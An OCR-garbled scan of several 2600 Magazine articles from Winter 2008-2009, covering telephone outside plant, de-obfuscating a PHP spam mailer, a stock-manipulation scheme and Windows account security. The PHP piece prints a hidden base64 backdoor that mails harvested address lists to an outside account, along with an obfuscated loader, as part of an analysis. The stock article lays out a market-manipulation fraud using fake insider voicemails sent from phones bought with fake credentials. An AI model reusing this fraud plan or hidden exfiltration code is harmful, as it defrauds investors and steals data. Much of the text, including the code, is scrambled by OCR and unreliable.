at around eight i n the morn i ng and sets just is what bri ngs a dial tone to your house.
after 4 pm. And outside, it's rainy, windy, and Th is forms a conti nuous (albeit often spliced)
miserable. Yes, just another day of relentless copper loop between the N I D on the side of
wi nter assault on the outside plant serving my your house and the frame i nside the Central
Central Office. Office. I nside a cable, up to 1 00 pa irs are
Around here, most people go to work i n grouped together i n a collection cal led a
the dark and come home i n the dark i n often "bundle," wh ich is wrapped i n an inner
dangerous driv i ng conditions. I nevitably, a sheath i ng, and then the bundles are wrapped
few cars get wrapped around uti l ity poles together i n a tough outer sheath i ng. There are
this time of year, knocking out electric power many different types of sheath i ng, and the type
and telephone service. Making matters worse, used largely depends upon the area in wh ich a
they don't call Washington the "evergreen cable is deployed and the age of the cable. For
state" for noth i ng. There are l iterally m i l l ions example, i n Brazi l (where termites are a huge
of Douglas-fir, Sitka Spruce, and Western Red problem), special i zed termite-resistant outer
Cedar trees (among others) standing over 200 sheath i ng is often used.
feet high. Their branches are as large as enti re Hungry term ites, of course, aren't the only
trees i n most other parts of the world. When enemy of a telephone cable, or even the most
the wind gets up to 100 miles per hour (as it common one. Here i n the Pacific Northwest,
did last year during the Hanukah Eve storm), the weather is the biggest issue for l i nemen
fall i ng branches can take out utility li nes just as to contend with . Whether a line is downed
easily as fal l i ng trees. When phone li nes aren't by a fallen tree or crashed automobile, police
bei ng knocked down one way or another, and fire departments are often the first ones
they're being pelted by rai n, wh ipped by wind, to respond. Safety is a major concern of
and even stolen by th ieves motivated by the first responders, as they don't always know
high price of copper. Add to that the fact that whether a downed l i ne is a dangerous high-
telephone cables can be decades old, and it's voltage electrical line or a relatively ben ign
sometimes a wonder that anyth ing ever works telephone line. Fortunately, there is a serv icE'
at all. called One-Ca l l, formally known as the Uti l ity
A switch is no good if you don't have a Notification Center. By dia l i ng the appropriate
conti nuous loop to it, and most of that loop is telephone number, fi rst responders report
what we call the "outside plant." Why outside? downed li nes to One-Call as soon as they
It's outside my Central Office. Everything i n arrive o n the scene. Based o n t h e address and/
here - the switch, frame, battery room, etc. or other identifying data (such as number plates
(where it's loud, dry, and a balmy 68 degrees) - on the affected telephone pole), One-Call then
is the "i nside plant." And outside it is... litera l l y notifies the affected utilities of the outage, who
millions ofmi les of cable crisscrossing the globe each respond by rolli ng a truck.
and linking nearly every household i n North Anywhere from a few mi nutes to several
America. Long distance trunks are redundant, hours later (dependi ng upon how nasty the
and networks are designed in ring topologies weather is and whether the tech nician cal led
such that a cable carrying your telephone cal l i s un ion o r not - somehow, non-union techs
can l iterally be cut in two without any impact don't seem to l ike getti ng up at 3 am in
to your conversation. Many i nteroffice trunks nasty weather for the measly $ 1 1 per hour
are simi larly designed. Unfortunately, the most their companies pay them), a truck wi l l rol l
vul nerable part of the network is the loop up to the scene. If multiple l i nes are down,
between the Central Office and your house. multiple trucks from multiple uti l ities wi l l rol l .
Telephone cables typically either run on Unfortunately, if a power l i ne is down, nobody
Winter 2008-2009 ----------------- Page 13

can start repair work until the power utility
shows up to de-energize the line.
Cable damage resulting from weather isn't
always as dramatic as drunks crashing into
telephone poles or tree limbs crashing onto
lines. Oftentimes, it happens slowly over many
years. Copper does corrode when exposed to
moisture, and sheathingon its ownis insufficient
protection against the elements. In particular,
this is the case when cables are older than my
mother (as is the case in parts of New York
City), and are wrapped with little more than
treated paper. As anyone who has ever visited
Manhattan knows, there are underground steam
lines everywhere - and they leak. This blasts
hot, moist steam at anything in the vicinity,
including telephone cables. Verizon solves the
problem there by pressurizing underground
cables with cold nitrogen, delivered from tanks
placed throughout the city. This keeps cables
dry and mitigates the corrosive impact of
steam, as nitrogen is an inert gas. Similar tanks
are used by AT&T in the Houston area, due
to the moist climate there. You can see them
placed at many junction and other equipment
boxes. Conversely, in desert areas, such as
the Valley of the Sun in Arizona, no measures
beyond heavy-duty sheathing are taken to
protect cables. This is because what little rain
falls in the area evaporates quickly, and rarely
penetrates far enough (or hangs around long
enough) to result in corrosion damage.
Here in the Pacific Northwest, nitrogen
tanks are rarely used. Most of our outside
plant dates from the 1960s or later, although
in a handful of places there is still cable in use
dating from the turn of the 20th century. In this
area, most cables are filled with a substance
called icky-pic. How did it get its name?
Well, icky-pic is the vilest substance known
to mankind. If you get it on your clothes, in
your hair, etc., you'll never get it out. It sticks
to everything, ruining whatever it touches.
Including your eyes; if you get it in your eyes,
it will literally blind you. Oh, and to top it off,
the stuff is actually flarnmable (being petroleum
based), so it should never be used indoors. But
icky-pic is inert, and water can't penetrate it,
and it's flexible (because it's a gel) so you can
fill cables with it. So for this area, it's a perfect
solution. That is, until the outer sheathing of
the cable eventually ruptures after 40 years of
neglect and the icky-pic leaks out. Eventually
the cable will corrode, and a splicer will have
to repair the damage.
Splicers, incidentally, repair all sorts of
interesting damage, on both fiber-optic and
copper cables. From euphemistically named
"backhoe incidents" (yes, any idiot with a
backhoe can knock out phone service to over
1,000 homes) to underwater lines caught by
boat anchors to more garden-variety damage
such as drug addicts cutting out sections of
cable to sell as scrap (yes, this really happens),
these folks have a very tough job. Piecing
4,200 individual pairs back together is a very
detail-oriented job, but good splicers need to
work fast. After all, if a splicer is on the job, it
usually means a lot of folks are without phone
service.
Working as a lineman can be a dangerous
job, since it involves working around electrical
cables and more than occasionally working
around slipshod, improperly grounded cabling
done by low-bidding non-union contractors.
For example, bucket trucks come in grounded
and non-grounded versions, so, as you might
imagine, it's highly important for linemen to
know which tool is appropriate for the job.
While linemen are not electricians (different
union), they are trained in the portions of the
National Electrical Code (NEC) applicable
to their jobs. Safety meetings, while both
frequently required and the bane of any
lineman's existence, are an important tool
used to communicate the latest procedures
and information.
And with that, it's time for me to take a
nap here at the Central Office. Safety meetings
are the bane of my existence too, and I have
a required one today. But it's online, so I can
sleep through it without anyone noticing!
References
• http://www.callbeforeyoudig.org/
One-Call Utility Notification Center for the
Pacific Northwest.
• http://www.ark ema-inc . com/ind e x .
"'cfm?pag�633 - Description of termite
resistant cable sheathing.
• http://gothamist.com/2008/01/31/
"'nitrogen_tanks.php - Article on nitrogen
tanks in New York City. In particular, see the
comments from SplicingDan.
• http://www.psihq.com/iread/strpgrnd.
"'htm -Proper grounding is very important
in outside plant. This is a great walkthrough
of the NEC (National Electrical Code)
requirements for grounding.
• http://www.sundance-communications.
"'com/cgi-bin/ultimatebb.cgi?ubb�get_
"'topic;f=31;t�000009;p�O - Great mes
sage board thread on proper grounding of
punch-down blocks, which is particularly
interesting because of the interplay of issues
that can occur during backhoe incidents.
Incidentally, this particular message board
is very informative on the subject of outside
plant.
Page 14 ------------------ 2600 Magazine

by Cliff
I magine you're a lame web designer.
How do you protect your precious HTML, as
if nobody's ever seen HTML before? I magi ne
you're add ing some kind of va l i dation to a
web page, but you don't want the va l idation
algorithm to be publ icly visible. Or you're
trying to h ide your mal icious code i n
an otherwise i nnocuous page? You use
obfuscation.
Obfuscation doesn't make code
i mpossible to read, it j ust makes it a pai n i n
the ass, and not worth botherin g with for the
average user. The great th ing with scripting
languages is that they are i nterpreted
plai ntext. I n order for the script to run, it
has to be human-readable at some stage
- all you need to do is to de-obfuscate it,
and read what the author didn't want you
to read. The more someone doesn't want
me to read someth i ng, the more curious I
become!
Common scripting languages incl ude
PH P, VBScript, and JavaScript. Each has
their own syntax and use, but have lots of
common programm i ng constructs. For
i n stance, PH P runs on the server, but not
on a browser, JavaScript can run on either,
and VBScript is most suited to server-side
execution. The one instruction every code
obfuscator uses is eval ( ), which works just
about the same i n each of these languages.
The eval("string") wi l l execute
the code contai ned i n the string variable
"string", whatever it may be. That code
may be i n cleartext, or it may be a short
program, to h ide the cleartext using other
functions which vary with the scripti ng
language used .
Here's a simple, real-l ife sample I took
from a PHP script. This PHP script was
called the "Yoga0400 Mass Mai ler." It was
forwarded to me by someone who found
a copy on their honeypot. It was a generic
PHP HTML i nterface for the box's own
SMT P server, and it looks as if it was handed
out freely to spammers to use as a service
to humanity. Some service - it contains a
l i ne:
echo eval (base64_decode( "bWFpbCgiZ
"3JvZmlfaGFjaOBob3RtYWlsLmNvbSI
"sICRzdWJqOTgsICRtc2csICRtZXNzY
"WdlLCAkcmEONCk7 " ) ) ;
Which made me curious - what did it do
that someone who gives away a spamming
script m ight want to keep a secret? This was
an easy one, and feel free to play a long at
home . . . I looked up PH P's base64_decode
function, and than ks to the excel lent http://
php-functions.com/ and simi lar sites, I was
able to decode the string in a b l i n k. Simply
copy and paste the string "bWFpbCgiZ3JvZm l
-faGFjaOBob3R tYWlsLmNvbSIsICR zdW
-JqOTgsICR tc2csICR tZXNzYWdlLCA
-kcmEONCk7" (without the quotes) i nto the
base64_decode box and hit "Subm it". You
shou ld see the result:
mail( " gxxxx@hotmail.com", $subj98,
.. $msg, $message, $ra44);
(OK, so I've x'ed out a few characters,
you can find them yourself if you care to.)
This secret script would take a copy of a l l
the ema i l addresses the spammer was usi ng,
and send it to gxxxx@hotmail.com - gxxxx
was usi ng th is giveaway tool to build up his
own spam l i sts! No honor amongst th ieves.
For what it's worth, I bel ieve hotmai l k i l led
that address off a while ago. It's very hard to
shed a tear for someone stea l i ng a spam l i st
from another spammer; either way it's the
i nnocent inboxes that get hosed!
This was an example of the base64_
decode () function i n PH P bei ng used
to obfuscate cleartext code. Another
commonly used function is gzuncompress ( ),

another layer of trying to h ide what -VZ sAx YpT z l 2 0B j 2 C 6 JK i Y z aUQ r 8 Em f F O
happens beneath the covers. For instance, - Z v 3 d s P Jhq2 WdaNhNq2 W 3 X G 6 b t 8 fHEbB
-OJwms 9NC r P P t e X + l 5 c qH 8 q l +VWtv 7 z q 5 U-b
a very innocent looking three l i nes that I've 3 RbLU 7 3V5 /MByNJ2 w 6my+Wq/Vmu 9 s bp
snipped heavily here - one of those three -mW D 4 3 r + 4 R i E U Z ycuE i z v D h f Xh i I E
l i nes is very, very, very long indeed - wou ld -KJBbg T 4 7 x DRfgDSAl 8 g ' ;
have fi lled several pages of 2600 for just $ a 2 =ba s e 6 4 _dec o de I $ a l ) ;
that expression. It's the obfuscated bit: $ a 3 = g z u n c omp r e s s l $ a 2 ) ;
< ? php II Th i s fi l e i s p r o t e c t ed by Next l did the base64_decodeO then using
I l copy r i gh t l aw a n d provi ded under a 30-day trial of a PH P debugger, did the
I !1 i c e n s e . Rev e r s e eng i ne e r ing of gzuncompress on the result. What l gotwas. . .
I i thi s fi l e i s s t r i c t l y proh i b i t e d .
I l ev a l s equence $ a 3
$ 000 0 0 0 0 0 0 = $ O O O O O O O O O = fopen 1 $ 000 0 0 0 0 0 0 , ' rb ' ) ;
-__F I L E__ ; $ O O O O O O O O O =__L I N E__ ; whi l e 1 - - $ 0 0 0 0 0 0 0 0 0 ) f ge t s 1
$ 00 0 0 0 0 0 0 0 = 4 2 8 9 6 ; eva l l g z un c ompr e s s l
_ $ 0 0 0 0 0 0 0 0 0 , 1 0 2 4 ) ;
-ba s e 6 4_decode l ' eNpl j 8 duwkAYh F « s n i p
-abou t 3 0 0 c h ar s » T 4 7 xD R f g D 5 A l 8 g f ge t s l $ 0 0 0 0 0 0 0 0 0 , 4 0 9 6 ) ;
_ ) ) ) ; re t u rn ; 7 > G Y Q Y A f s K I O EW / c BaM l x $ O O O O O O O O O = g z uncomp r e s s I b a s e 6 4_dec
- r EmJqy 6 xkdCvA s LRv 6 T V i HHeQ FVmVAsp -ode 1 s t r t r 1 fread 1 $ 0 0 0 0 0 0 0 0 0 , 4 8 0 ) , '
-« s n i p abou t 4 0 kb o f s i m i l a r s tu f f - E n t e r youwkhRHYKNWOUTAaBb C c DdF
- » 7 G / T / n t YYF I = =
- f Gg l i Jj L lMmPpQqS sVvXx Z z 0 1 2 3 4 S 6
The first l i ne is easy - someone - 7 8 9 + 1 =
'
, ' ABC DEFGH I JKLMNO PQRST
prohibiti ng me from seeing what code they -UVWXYZabcdefghi j klmnopqrs tuvwxyz
want to run on my computer? I ignored it, - 0 1 2 3 4 5 6 7 8 9 + 1 ' ) ) ) ;
so sue me. Next we have a few variable eva l 1 $ 0 0 0 0 0 0 0 0 0 ) ;
declarations in a si ngle l i ne. Unkindly, the Cheeky! More of the O's and zeroes.
person obfuscating the code used a real mix Reformatted and renamed. . .
of characters here _ Courier New renders I i next l i n e s add r e s s the da t a l i n e s
$ s t re am 1 = f open l $fil e , ' rb ' ) ;
them a l l the same (see above), so let's try wh i l e l - - $ l i n e ) f ge t s l $ s t r e am1 , 1 0 2 4 ) ;
a different font. Wingdi ngs shows us what's f g e t s 1 $ s t ream1 , 4 0 9 6 ) ;
goi ng on here rather wel l : $ b l = f read 1 $ s t ream1 , 4 8 0 ) ;
n, n, n, � n, O n C F-
1 / $ b 1 = ' W / « l o t s o f
&V'ru rv r-, CJ rv �l _l D - s n i ppage» 1 / 8 l s R3 kgX 3 JRrh 9 Em ' ;
That seemi ng $ 0 0 0 0 0 0 0 0 0 is actually a $ b 2 = s t r t r l $ b 1 , ' En t e ryouwkhRHYKNWOUTAa
mix of O's and zeroes, slippery. Of course, _BbC c DdF f Gg I i J j L lMmPpQqS sVvXxZ z
the second and third variable are different - 0 1 2 3 4 5 6 7 8 9 + 1 = ' , ' ABC DEFGH I JKLMNOP
mixes of O's and zeroes. This is clearly -QRS TUVWXYZ abc de f gh i j k lmopqr s tuvw
going to be a battle, l ucky I'm so obstinate! -wxy z 0 1 2 3 4 5 6 7 8 9 + 1 ' ) ;
I did a bit of renaming myself:
$ b 3 = ba s e 6 Cdecode 1 $b2 ) ;
I I $ OOO O O O O O O = __F I LE__ ;
$b 4 - g z u ncomp r e s s ( $b3 ) ;
$ fi l e =__F I L E__ ;
So the original th ird l i ne comes into
I / $ O O O O O O O O O =__L I NE__ ; play - the 40kB is a l l data for the routi ne
I I $ l i n e = __L I NE__ ; obfuscated in the second l i ne. The script
$ l ine= 4 7 ; opens its own fi le, reads the data l i ne, uses
1 1 $ 00 0 0 0 0 0 0 0 = 4 2 8 9 6 ;
strtr to translate characters, then performs
$ o f f s e t = 4 2 8 9 6 ;
another base64_decode and gzuncompress
I figured $file, $ li ne and $ o f f s e t would
on the resulting data. I nteresti ngly, here we
be more useful names initia l ly to get me
see evidence that th is has been obfuscated
rol l i ng, and so used search and replace, and
with a tool ofsome sort _ the strtr string starts
not for the last time. Particu larly neat was
"Enteryou" which is qu ite possibly the start
the use of �FILE� and � LINE�, which
of "Enter your seedi ng stri ng here" or some
meant adapting the code wou ld damage
't h th h d d d I f I
similar default value. Not that anyone but
I , ence e ar -co e va ue or $1 ine.
a madman wou ld rol l this stuff by hand, of
worked out why it was so important, and
what the l ine number wou ld be once I'd
course. Or reverse engi neer it.
tidied the code up. Th is was a very clever
By now, I was feel i ng mightily proud of
obfuscation! Continui ng, I tidied the code
myself. I was clearly getting closer. $b4
a bit:
contai ned another bloomi ng mash ofO's and
$ a 1 = ' eNp l j 8 duwkAYhF / G O u 4 qR l m I 4 4 A s
zeroes, base64_decodes, gzuncompresses,
- H + i dpbdL 5 PK 7 gBu 7 L s DTBxREhKK Z 0 2 j freads, strtr's, and a new one for me, ere�
-m k O Z i l F J 2 E 9WdO I E I S 4 yx 3 0 BG 3 E RE K z w / repl ace, which when tidied gave us. . .
-AFwqS e x e v J s 4 LqQC S 8 +pXKYVhWj / $ c 2 � f r e a d l $ s t r eaml , $ o f f s e t ) ;
-YoXWVKLd i I + 1 7 l 6 z y l rDh I MQ 2 DQEqMq 3 D $ c 3 = s t r t r ( $ c 2 , ' E n t e r y o u w khP,W:KNWOU
Page 1 6 -------------------2600 Magazine

-TAaBb C c DdF f Gg l i Jj L l MmPpOoQqS s
There are other techniques i n use to try
-VvXx Z z 0 1 2 3 4 5 6 7 8 9 + / = ' , ' ABCDEFGH I JK
to protect scripts - you might find scripts
-LMNO PQRS TUVWX Y Z abcde f gh i j k lrnnopqr
referenced in a cl ient-side include, for- s tuvwx y z 0 1 2 3 4 5 6 7 8 9 + / ' ) ;
h h h d$ c 4 =b a s e 6 4 _de c o de ( $ c 3 ) ;
instance, i n t e hope t at as t ey on't
$ c 5 = g z uncornp r e s s ( $ c 4 ) ; appear in your browser, you can't see
/ / $ c l = e r e g_rep l a c e ( ' the script. Try your browser cache for
- F I LE ' , " ' '' . $ fi l e . " ' '' , $ c 5 ) ; these scripts. Javascript has its share of
$ c 6 = s t r l e n ( $ c 5 ) ;
obfuscated code too - again you'll see string
Now I wondered if I was going in circles? replacements, offsets, loops within loops,
Earlier I had for 90 minutes. The code is so obscure programming constructs, anythi ng
cleverly recursive that if you miscount a to throw you off the scent - but remember,
position, etc, you l itera l ly end up in a loop. it wi l l always give you a c1eartext version of
Utterly bri l l iant, but that meant the code the script in the end, otherwise the engine
had to succumb to me or ki l l me trying. cou ldn't run it.
print ( $ c 6 ) ; The best thi ng you can do from here
p r i n t ( $ c 5 ) ; / / durnp the s e c r e t s c r i p t
is to find some obfuscated code, and
f c l o s e ( $ s t rearnl ) ;
have a go yourself - it's quite rewardi ng
re turn ;
when you finally see what someone has? >
I have to admit, my worksheet was worked so hard to stop you from seeing.
f Often, it's quite mundane - some idiot hasgetting crazily messy by now, and some 0
my workings may wel l appear to be missing
thought you rea l ly want to copy his crappy
a 1 er t ( ' Pa g p P ro t p c ted by xxx ' ) script - but
steps - th is article is about the principle
sometimes you hit the weird and wonderfu l
though, not this scri pt. But this was it, I
stuff, and it's quite i nformative.
now had the final script, hidden deep i nside
Wel l obfuscated code wi l l not give up
some crazy obfuscated code. The first thing
any secrets in a regu lar debugger either _
Ave did when I tried to save the fi le was to
taking it out of context can cause problems,
panic. I knew I'd hit paydirt. And indeed or executing a whole l i ne at a time wi l l
i t was an exploitation tool kit designed to prevent you from steppi ng through every
run on Unix and Linux variants, very cute iteration of an obfuscation. You need to
i ndeed. I'm afraid I won't list the actual pu l l the code to pieces to see what happens
code here. It's not relevant and it's not n ice, at the heart. Work methodica l ly, evaluate
and frankly I 've lost a chunk of it. terms one at a ti me, rename stupidly
But this journey is typical of the work named variables, but be sensitive to any
you have to put i nto seemi ngly impossible environment variables l i ke _L1 N E_ which
de-obfuscation of scripti ng languages. can trip you up. Each step reveals more
They're usually obfuscated with software puzzles to solve, but i n the end you can
tools, they're usual ly several layers deep, discover some of the gui lty secrets of the
and they try every kind of diversion they web! It's a good hobby. Maybe post some
can to throw you off the scent, i nto loops, of your steps, discoveries, and gotchas to
etc. I learned more about the internals of 2600 too, so we can a l l learn a bit more too.
PHP de-obfuscati ng this code than any Thank you for your attention and i nterest. I
tutorial has ever taught me. hope this has i nspired you somehow.
Ch�� Oui:; Our n�¥L!J 5 irl:;
Do you have one of the new 2600 shirts
yet? Not only is it a piece of clothing that will
shelter you from the elements, but it's also an
educational tool that will show you the many
ways your phone calls can be overheard.
Full color diagram on the front with explanation
on the back. Available i n all sizes, $20.
2600, PO Box 752, Middle Island, NY 1 1 953
or order online - store.2600.com
Winter 2008-2009 -----------------

by Isreal shou ld be quickly buyi ng it. They might
even h i nt that they are tal king about i nside
The fol lowing is an educational article i nformation but usual ly not say it outright.
and should be treated as such. I, the author, Eventually, after enough messages were
hold no responsibil ity for anyone who uses sent, the stocks would in fact start to j ump a
this i nformation in an i l legal manner. With l ittle. The great thing about the stock market
that out of the way, let's explore how a and disinformation l i ke this is that if enough
sma l l bit of low-tech social engi neering can people start buying to make a difference, it
exploit gas prices and the foundation of the becomes a real gain. Other i nvestors start
economy. seeing this and they too start buying it.
A year or two ago I read about a group But supposedly the phreakers would
of phreakers who were conning fol ks. At sel l out when the worthless stocks peaked
the time no one could seem to catch them and take the profits. Real i nvestors would
or get any kind of leads. Apparently the sel l and then a l l the saps would be left with
scam went l i ke this: a tiny company on these crappy l ittle stocks.
the stock market that had very low stock All this sounds grand but how cou ld this
prices wou ld be selected, and they would i nformation be helpfu l ? Or rather, cou ld it
send text messages or voice mai l s to many be useful i n reverse? Every day I go to the
people, pretendi ng they had a piece of gas pump I get mad. Who doesn't right
i nside i nformation. now? But the price of gas is mostly decided
I nside i nformation is i l legal on the stock by two things: supply and demand. Supply
market. Keep this i n mind because the is nothi ng we can really control. (Unless
victi ms in this scam do not want to report you work for OPEC.) However, demand is
themselves breaking the law! Notice, I said generated by two thi ngs: consumption and
texts and voice mails, not real phone calls. stocks!
This is important because most people So, if you redid the scenario, only you
would not j ust pass out i nside i nformation told people to sel l, this would be equally
on a hot stock tip to just anybody. This economically manipulative. It would also
would a l low the phreakers' messages to be more plausible to just target one oil
come across as wrong numbers, but sti l l get giant, say Exxon-Mobi l for example. If one
the point across. company's stock started a drastic drop, it
Most of the time, reports said that voice could cause a panic on the wholeoil market.
mail was left by an attractive sounding Not to mention it sounds more believable
woman's voice. (Probably to keep men that one would have inside information on
listeni ng.) They would usua l ly be in a panic one company, not an enti re i ndustry. Even if
tal king hurriedly and sneakily, saying that you only dent that one company, the others
they j ust found out some news around "the wi l l follow the price they charge to not be
firm" about XYZ stock and that someone outsold by a competitor.
Page 18 ------------------- 2600 Magazine

Now that we have a method and a target
we need to find a means of injection. This
part would work differently because we are
now sel l ing, not buying. Anyone can buy
stuff, but to sel l we need to find people
who own these stocks. I suppose an el ite
hacker cou ld break i nto a database ful l of
share holders contact numbers, but that is
beyond the scope of this article. Here we
are goi ng to use our good friend Google! A
simple search of "Stockbroker + MyTown"
wi l l probably render many results, so
it wi l l for any other town you type in.
Stockbrokers are never supposed to spread
i nside information. (And cops are never
supposed to break the law. . .) It happens
it's their job to suggest to people what to
buy, what not to buy, and sometimes what
to sel l . Reaching them wi l l help reach the
people who keep them in a job by buying
and sel l i ng stock. Any respectable broker
these days wi l l have a website with a phone
number on it. Not to mention, many of
these guys have watched the oil companies'
shares skyrocket the last few years and own
some themselves!
Now, there are a mu ltitude of ways
we could send these aggressive texts and
voicemails - by phreaki ng, B l uetooth
hacking, Vol P, etc. These are a l l great
ideas, but again they fal l outside the scope
of a mere social engineering article. For
now, let's reproduce this experiment very
low-tech . Most of us have seen the prepa id
cel l phones i n stores. Fake credentials are
usual ly easy to come by, if the carrier even
checks them at a l l . Or a good eBay phone
with a prepaid GSM SIM card wi l l work fine
too.
It may take thousands of calls to make
a real dent i n a stock's price. After a l l, if
you cal l 2000 brokers, not everyone wi l l
have that stock. I f they do, they may not
th ink that the wrong number they got was
from someone who really knew what they
were tal ki ng about. They may also have a
legal or moral issue with acting on i nside
i nformation, but that won't stop them from
watchi ng!
Here's the catch: Once the stock has
started to slide, it is no longer inside
i nformation, it's just a bold fact. You're
no longer acting on i l legal advice, you ' re
acting on the actual flow of the market.
People who had ethical questions before
wi l l no longer have an issue and w i l l sel l .
The people who didn't bel ieve you before
wi l l see it start slipping or sl iding and sel l .
Finally, the other i nvestors who you never
even contacted wi l l see th is and if you've
made a big enough dent, they wi l l sel l
too! This cou ld cause a panic and perhaps
prompt a sel l-off in oil stocks you did not
slander as wel l . VVhen market shares
plummet, so does demand and price.
Th is would be one way to lower the
price of gas. . . If it were lega l .
booksellers worldwide including
http://amazoncom/2600
Winter 2008-2009 ------------------ Page 1 9

by DieselDragon
OxOO. Introduction:
Fol lowi ng a long period of playing
around with the various security tools and
features in Windows, I thought that I'd share
some of my findings. Hopefu lly, this might
help those of us "locked in" to using the
Windows fam i ly in protecting our machines
a l ittle bit better than they are normal ly. The
things detai led here have been tested and
appl ied on a machi ne running Windows XP
Pro SP2, but shou ld hopeful ly be supported
i n a l l versions of Windows 2000, XP and
Vista.
OxOl . Who this guide is for:
Most articles in 2600 seem, to my eye,
to be written mainly for those l ucky enough
to be able to understand and use Linux
without experiencing serious implosion
of the brain. Sadly, some of us are classic
victi ms of vendor lock-in and, try as we
might, find that the only kind of OS we
can efficiently use is one of the Microsoft
Windows family of operati ng systems. This
article is primari ly aimed at general users
of Windows, and concentrates mainly on
applying secure practices in Windows XP.
The methods and practices used here shou ld
also be adaptable for use i n Windows Vista
and other operating systems.
Th is article has been written so that it
can be used easily by those without much
computer know-how (such as the less
computer-savvy friends of regular readers)
and as a result a lot of the wording may
appear very simple and newbie-friendly to
more experienced readers. Please accept
my apologies in advance if this article is too
simpl istic or verbose.
I f Y o u ( " Expe r i enced u s e r " ) = True Then
Gata O x 0 7
E n d I f
Mak in g Y o u r
W in d ows B ox
A L it t l e Mo r e
S e c u r e
has been based on NT technology from
Windows 2000 onwards. One of the major
benefits of this change has been a switch
over from using the FAT fi lesystem - which
had been i n use since 1 980, and had no
support for user accounts and fi le security
to the NTFS filesystem, which supports user
accounts and allows for user-specific access
control to individua l fi les and folders.
In short, this means that any user
on a Windows 98/ME machine can
i nsta l l programs and make changes to
the operating system without needi ng
administrative privi leges, whereas users on
Windows 2000/XPNista computers who
don't have the administrator privi leges,
cannot generally make any changes except
creating and changing fi les i nside thei r own
document folders. In addition, the same
security measures also mean that User A
cannot read or change User B's fi les un less
User A has administrative privileges, or User
B has specifical ly a l lowed User A access to
those fi les.
Ox03. A hypothetical case-study:
Let's take the Doe fami ly: john and
jane Doe, and their three chi ldren: Claire,
Mark, and David. They bought their home
PC from a major computer store about two
years ago. It came with Windows XP Home
Edition. john uses the computer for editing
sensitive work documents that include
private financial and cl ient data. jane runs a
busi ness from home and uses the computer
to keep track of business finances, word
processi ng, cl ient management, and onl ine
banking. The children mainly use the
computer for surfing the I nternet and using
various instant messaging appl ications,
although Claire also manages an ever
i ncreasi ng music l ibrary using iTunes, Mark
creates and edits music using several studio
packages, and David plays j ust about any
Ox02. Security in Windows - half i nteresting game that can be freely
A brief intro: downloaded from the I nternet.
With the exception of Windows CE When they set up their computer, the
and ME� the Wi ndows operating system Doe fam i ly simply plugged it i n and turned
Page �O ------------------- 2600 Magazme

it on, giving no thought to computer and
user management. They created user
accounts for everyone using the Windows
default settings - unwitti ngly giving a l l
five users fu l l administrative privileges, and
al lowing anyone logged in to the machi ne
to i nstall programs and change any aspect
of the operating system.
At this stage, everyone has become
extremely annoyed with the computer.
Over time it has gradually slowed down and
become increasi ngly unrel iable. Their anti
vi rus programs (of which they have several)
continually warn of viruses and malware
that keep appearing over and over, and
nothi ng they try seems to get rid of them.
They can't seem to figure out how all of
th is malware keeps making its way through
the firewa l l and insta l l ing itself onto the
computer. In addition, unusual transactions
from foreign countries have recently started
appearing on Jane's busi ness account with
an ever i ncreasing frequency.
Ox04. Spotting the security flaws:
Anyone with an eye for computer
security wi l l immediately spot several major
mistakes in the way that the system has been
set up and managed. Giving all users of
the computer administrative privi leges is a
major error in any ci rcumstance. Especially
so, when some of those users are chi ldren.
As any parent wi l l readily testify, chi ldren
love playing computer games. The first thi ng
he or she will do upon coming home is to
download and i nsta l l the game so that they
can play it with their friends and compete
for the h ighest score. Very rarely wi l l a child
think to run a virus/malware scan over the
game before i nsta l l i ng it. They may even
think that it's safe just because it came
from a website. If the game comes with
malware attached, as so many "free" games
appl ication, is known to make use of some
kind of onl ine functional ity.
Likewise, giving any regularly used
account administrative rights is an unwise
practice for a computer in a home or
general office environment, as it wou ld
grant any potentially mal icious code (say,
ActiveX controls in a web page) fu l l reign of
the system. It takes only a momentary lapse
in security - or just a single web page - for
malicious code to arrive and be executed on
the computer. For general computer use, the
best practice, in my personal opi nion, is for
every user of the system to have a restrictive
user account that can only make changes
to the user's own document folders, and to
have a single administrator account that is
password protected and is only ever used
for system maintenance purposes and the
i nstallation of known, trusted applications...
simi lar to the best practice often appl ied
on Linux mach ines concerni ng use of the
"root" account.
Although this practice wou ld not defeat
all forms of malware, it shou ld make it
much harder for a mal icious appl ication to
gain fu l l control of the system and access
every file on the machi ne. This means that
malware arriving and successfu l ly i nsta l l ing
itself under a chi ld's account can only
access and manipulate data i n the chi ld's
document folders, and shou ld only be able
to monitor whatever that child is doi ng, as
opposed to monitoring every keystroke and
mouse cl ick of every user of the machi ne.
Remember that when an appl ication is
run, it is subject to the same privileges
and restrictions as the user who started it,
therefore an application running under a
restricted user account shou ld not be able
to make changes to the operating system, or
access any other user's fi les.
and appl ications do, then it' l l be i nstal led Ox05. A clean,
along with the game and gai n ful l access more secure installation:
to everything on the system. Remember, John Doe has had enough of the constant
the chi ld's account has admin rights. In this virus and malware alerts, the abysmal
case, a firewal l (or even 1 ,000 firewal ls) machi ne and I nternet performance, and
would be completely useless in preventing the conti nual errors. Enl isting the help and
the appl ication from making it to the advice of a computer-l iterate friend (who
computer because the initial connection to we'l l cal l Bob), he decides to go for a ful l
the download site was made by the user. format and rei nstallation of his system.
Although a firewal l might warn the user that U nder Bob's supervision, he carefully
the appl ication is trying to communicate backs-up user files on the machine,
with the I nternet when it's run, many users avoiding unrecognized EXE, COM, MSI,
wi l l allow such communications as a reflex and VBS files in the chi ldren's accounts. He
action, especially if the game, or whatever unplugs the Ethernet cable from the back
Winter 2008-2009 ------------------ Page 2 1

of the computer, and reboots the machi ne
with the Wi ndows XP CD-ROM inserted.
After rebooti ng, he performs a ful l NTFS
format of the hard drive, and Windows XP
begi ns i nsta l l i ng as normal .
After the usual succession of reboots,
progress bars, language/network related
prompts, setting a very strong password for
the "Administrator" account, and on-screen
messages of how "superior" Windows XP
is, he comes to the Windows XP first-run
screen or what Microsoft calls an "Out of
Box Experience." Upon arrivi ng at the page
where the user enters names for accounts
that will use the machine, Bob tel ls him
to stop entering account names as there
is a problem with this page: All accounts
created here wi l l be given administrative
rights by defau lt, and it's very difficult, if
not downright impossible, to change them
to l i m ited accounts later on. Instead, Bob
has a "restricted" account that wi l l not be
able to change anythi ng that would affect
the system. Additional ly, he turns off the
"Fast user switchi ng" feature (User Account
control panel > Change how users log on
and off) to reduce the chance of a mal icious
application running under a restricted user
account managing to "j ump" over to the
SuperUser account if both are logged in at
the same time.
Final ly, after rei nsta l l i ng Windows,
activating the Windows firewall, creating
restricted accounts for all users, performing
fresh i nstalls of security software and
firewalls, and restoring backed-up user data,
he tests his restricted account by logging on
and trying to insta l l an appl ication, finding
